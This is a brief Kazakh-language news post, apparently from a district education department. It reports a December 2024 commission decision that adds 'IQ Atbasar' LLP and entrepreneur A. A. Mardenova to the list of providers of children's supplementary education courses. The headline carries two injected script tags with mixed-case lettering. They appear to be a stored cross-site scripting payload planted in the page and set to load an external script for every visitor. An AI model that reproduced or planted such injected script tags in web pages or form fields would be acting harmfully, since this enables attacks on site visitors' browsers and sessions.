Білім беруге мемлекеттік тапсырыс бойынша комиссия отырысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.12.2024
2024 жылғы 30 желтоқсанда білім бөлімінде қосымша білім беруге мемлекеттік тапсырыс бойынша комиссия отырысы өтті. Конкурсқа қатысуға құжаттар "IQ Atbasar" ЖШС және "Марденова А.А."ЖК-дан берілді. Отырыс қорытындысы бойынша, құжаттар топтамасын қарағаннан кейін комиссия мүшелері ШЕШІМ ҚАБЫЛДАДЫ: "А. А. Марденова" ЖК-ны үйірменің келесі түрі бойынша балаларға қосымша білім берудің білім беру бағдарламаларын іске асыратын ұйымдардың тізбесіне қосу: "Қыш өнері" - 30 адам. "IQ Atbasar" ЖШС үйірмелердің мынадай түрлері бойынша балаларға қосымша білім берудің білім беру бағдарламаларын іске асыратын ұйымдардың тізбесіне енгізілсін: 1. Тілдік курстар. Қазақ тілі-40 адам 2. Тілдік курстар. Ағылшын тілі-40 адам 3. Арт-терапия-20 адам
 
Просмотров: 558


Пікір қосу



Деректерді қолтаңбаға қосу